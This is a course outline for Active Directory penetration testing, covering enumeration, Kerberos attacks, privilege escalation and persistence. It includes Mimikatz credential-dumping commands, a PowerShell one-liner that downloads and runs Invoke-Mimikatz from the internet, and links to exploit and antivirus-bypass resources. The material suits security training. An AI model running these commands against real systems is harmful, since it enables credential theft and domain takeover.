Most enterprise networks today are managed using Windows Active Directory and it is imperative for a security professional to understand the threats to the Windows infrastructure.
Active Directory Pretesting is designed to provide security professionals to understand, analyze and practice threats and attacks in a modern Active Directory environment. The course is beginner friendly and comes with a walkthrough videos course and all documents with all the commands executed in the videos. The course is based on our years of experience of breaking Windows and AD environments and research.
When it comes to AD security, there is a large gap of knowledge which security professionals and administrators struggle to fill. Over the years, I have taken numerous world trainings on AD security and always found that there is a lack of quality material and specially, a lack of good walkthrough and explanation.
The course simulate real world attack and defense scenarios and we start with a non-admin user account in the domain and we work our way up to enterprise admin. The focus is on exploiting the variety of overlooked domain features and not just software vulnerabilities.
We cover topics like AD enumeration, tools to use, domain privilege escalation, domain persistence, Kerberos based attacks (Golden ticket, Silver ticket and more), ACL issues, SQL server trusts, and bypasses of defenses.
Local Escalation and Enumeration
Domain Enumeration
-
2Local User & Group Enumeration
-
3Network Enumeration
-
4Antivirus & Detections
-
5Hunting Passwords
-
6Tools
-
7Windows Version and Configuration
winpeas (Winpeas has watson embedded)
Github repos of exploits:
https://github.com/nomi-sec/PoC-in-GitHub
https://github.com/abatchy17/WindowsExploits
https://github.com/SecWiki/windows-kernel-exploits
-
8Sherlock/Watson
https://github.com/rasta-mouse/Sherlock
https://github.com/rasta-mouse/Watson
PS C:AD> Import-Module .Sherlock.ps1
PS C:AD> Find-AllVulns
-
9CVE-2019-1388
-
10Schedule Task Privilege Escalation
-
11Unquoted Service Path
-
12SEImpersonate
-
13Windows - Privilege Escalation and Local Enumeartion Cheat Sheet
-
14Recommended Windows Hack The Box machines
Recommended Windows Hack The Box machines to Practice Privilege Escalation
Regretably, the vast majority of HTB Windows machines require kernel exploits for privilege escalation. I found the following machines helpful for practicing priv esc (read, not your typical privilege escalation).
Chatterbox
Jeeves
Access
Active
SecNotes
Lateral Movement
-
15User Enumeration
-
16Domain Group Enumeration
-
17Domain Computer/Servers Enumeration
-
18GPO and OU Enumeration
-
19Domain Shares Enumeration
-
20ACL Enumeration
Good Read:
https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=net-5.0
-
21Active Directory Recon
https://github.com/sense-of-security/ADRecon
.ADRecon.ps1 -OutputType HTML
-
22BloodHound SettingUp BloodHound
Download Bloodhound GUI
https://github.com/BloodHoundAD/BloodHound/releases
Download and install Java
https://www.java.com/en/download/
Download JDK
https://jdk.java.net/archive/
setx -m JAVA_HOME "C:ADBloodhoundjdk-11.0.9"
Download Neoj4
https://neo4j.com/download-center/#community
neo4j.bat install-service
neo4j-admin set-initial-password yourpasswordhere
neo4j.bat start
neo4j.bat stop
Download SharpHound
https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
powershell -ep bypass
import-module .SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Verbose -Domain pentesting
BloodHound Website
https://bloodhound.readthedocs.io/en/latest/index.html
-
23BloodHound Basics
-
24User Hunting Domain Enumeration - Lateral Movement
-
25Domain Enumeration Cheat Sheet - PowerView
Domain Privilege Escalation
-
26Before You Start
-
27How Kerberos Work
-
28Dumping SAM and SYSTEM For Offline Cracking
-
29SAM & LSA with MimiKatz
LSA and SAM
https://networkencyclopedia.com/local-security-authority-lsa/
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
https://www.windows-active-directory.com/windows-security-account-manager.html
Dumping NTLM Hashes from SAM using Mimikatz
https://joshdawes.com/dumping-ntlm-hashes-from-sam-using-mimikatz/
Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -ComputerName target1.example.org
#Elevate Privileges to extract the credentials
privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
token::elevate
#Extract from lsass (memory)
sekurlsa::logonpasswords
#Extract from SAM
lsadump::sam
#One liner
Invoke-Mimikatz -Command "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds #Dump creds from memory
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'
https://book.hacktricks.xyz/windows/stealing-credentials#dump-lsa-secrets
-
30PassTheHash with MimiKatz
A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor doesn’t need to decrypt the hash to obtain a plain text password. PtH attacks exploit the authentication protocol, as the passwords hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system’s active memory and other techniques.
-
31Passing the ticket
In a pass-the-ticket attack, an attacker is able to extract a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on a system and then use this on another system to request Kerberos service tickets (TGS) to gain access to network resources.
One primary difference between pass-the-hash and pass-the-ticket, is that Kerberos TGT tickets expire (10 hours by default) whereas NTLM hashes only change when the user changes their password. So a TGT ticket must be used within its lifetime, or it can be renewed for a longer period of time (7 days).
-
32Pass the ticket with Rubeus
-
33Session Hijack
-
34SMB Relay Attack
#Download Inveigh here:
https://github.com/Kevin-Robertson/InveighZero
-
35Bypass AMSI with mimidogz
-
36Bypass Anti Virus Run mimikatz
https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
-
3710 ways to get dump files
https://book.hacktricks.xyz/windows/stealing-credentials
Domain Persistence and Dominance
-
38Before You start This Section - Domain Privilege Escalation
-
39ACL - GenericAll on Group
More on ACL:
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces
-
40Priv Esc – DNSAdmins
https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise
-
41dcsync
DCSync is a credential dumping technique that can lead to the compromise of individual user credentials, and more seriously as a prelude to the creation of a Golden Ticket, as DCSync can be used to compromise the krbtgt account’s password.
To perform a DCSync attack, an adversary must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. It is also possible for any user to be granted these specific privileges. Once obtained, an adversary uses the Directory Replication Service (DRS) Remote Protocol to replicate data (including credentials) from Active Directory.
The KRBTGT is a local default account that acts as a service account for the Key Distribution Center (KDC) service. It's created automatically when a new domain is created. It cannot be deleted. its name cannot be changed. it cannot be enabled.
KDC service handles all Kerberos ticket requests so KRBTGT account in AD plays a key role that encrypts and sign all Kerberos tickets for the domain.
-
42ZeroLogon CVE-2020-1472
Zerologon, tracked as CVE-2020-1472, is an authentication bypass vulnerability in the Netlogon Remote Protocol (MS-NRPC), a remote procedure call (RPC) interface that Windows uses to authenticate users and computers on domain-based networks. It was designed for specific tasks such as maintaining relationships between members of domains and the domain controller (DC), or between multiple domain controllers across one or multiple domains and replicating the domain controller database.
-
43Unconstrained delegation - Computer
-
44constrained Delegation - Computer
Kerberos constrained delegation was introduced in Windows Server 2003 to provide a safer form of delegation that could be used by services.
When it is configured, constrained delegation restricts the services to which the specified server can act on the behalf of a user.
This requires domain administrator privileges to configure a domain account for a service and is restricts the account to a single domain.
In today's enterprise, front-end services are not designed to be limited to integration with only services in their domain.
-
45ACL - GenericWrite on User
-
46SET-SPN - Kerberoast
You need to have GenericAll or GenericWrite to set the SPN
-
47Targeted Kerberoasting - AS-REPs - FINDING
The ASREPRoast attack looks for users without Kerberos pre-authentication required attribute (DONT_REQ_PREAUTH).
That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message.
This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.
Furthermore, no domain account is needed to perform this attack, only connection to the DC. However, with a domain account, a LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.
-
48Targeted Kerberoasting - AS-REPs - SET